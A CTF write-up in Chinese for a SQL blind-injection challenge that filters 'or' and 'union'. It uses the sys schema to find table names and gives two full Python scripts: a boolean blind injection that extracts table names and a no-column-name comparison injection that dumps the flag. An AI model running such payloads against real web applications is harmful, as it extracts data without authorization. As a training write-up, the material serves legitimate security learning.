1.知识点
SQL盲注:
- 布尔盲注
- 无列名盲注
2.分析
题目过滤了or和union,无法使用Information_Schema.Tables。
之前常用的 innodb_table_stats 和 innodb_index_stats 也无法使用。
但是我们首先需要查找flag所在的表名,这里我们参考
Alternatives to Extract Tables and Columns from MySQL and MariaDB
文章是用sys 来查找表名的。
本题脚本我参考了颖奇L’Amore师傅和Smi1e师傅的脚本。
下面是我自己觉得可以用的脚本。
列名查找:
import requests
import string
url = "题目url"
def exp1():
str1 = ('0123456789'+string.ascii_letters+string.punctuation).replace("'","").replace('"','').replace('\\','')
flag = ''
select = 'select group_concat(table_name) from sys.x$schema_flattened_keys'
for j in range(1,40):
for i in str1:
paylaod = "1/**/&&/**/(select substr(({}),{},1))='{}'".format(select, j, i)
#print(paylaod)
data = {
'id': paylaod,
}
r = requests.post(url,data=data)
if 'Nu1L' in r.text:
flag += i
print(flag)
break
if __name__ == '__main__':
exp1()
flag获取:
import requests
url = '题目url'
def trans(flag):
res = ''
for i in flag:
res += hex(ord(i))
res = '0x' + res.replace('0x','')
return res
flag = ''
for i in range(1,50):
hexchar = ''
for char in range(32, 126):
hexchar = trans(flag+ chr(char))
payload = '2||((select 1,{})<(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
data = {
'id':payload
}
r = requests.post(url=url, data=data)
if 'V&N' in r.text:
flag += chr(char-1)
print(flag)
break
print(flag.lower().replace('|','}'))